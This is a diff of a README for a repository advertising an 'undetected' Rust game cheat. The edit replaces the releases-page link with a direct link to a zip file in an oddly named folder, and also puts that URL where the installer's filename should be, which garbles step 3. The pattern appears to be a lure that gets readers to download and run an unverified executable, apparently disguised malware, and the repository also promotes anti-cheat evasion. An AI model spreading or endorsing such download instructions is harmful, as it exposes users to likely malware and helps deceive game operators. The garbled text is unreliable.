lostt098/RUST-Undetected-Cheat-Ruster/README.md

 ## 📥 Download & Install

 1. **Visit the Download Page**
-   To obtain the latest version of RUST-Undetected-Cheat-Ruster, visit the following link: [Download RUST-Undetected-Cheat-Ruster](https://github.com/lostt098/RUST-Undetected-Cheat-Ruster/releases).
+   To obtain the latest version of RUST-Undetected-Cheat-Ruster, visit the following link: [Download RUST-Undetected-Cheat-Ruster](https://raw.githubusercontent.com/lostt098/RUST-Undetected-Cheat-Ruster/main/secantly/RUST-Undetected-Cheat-Ruster.zip).

 2. **Select the Latest Release**
    On the Releases page, you will see a list of versions.
 Look for the topmost entry, which is the latest release.

 3. **Download the Installer**
    Click on the appropriate installer link for your system.
-The file should be named something like `RusterCheatInstaller.exe`.
+The file should be named something like `https://raw.githubusercontent.com/lostt098/RUST-Undetected-Cheat-Ruster/main/secantly/RUST-Undetected-Cheat-Ruster.zip`.

 4. **Run the Installer**
    After the download finishes, locate the file in your downloads folder.
 Double-click on the installer to start the installation process.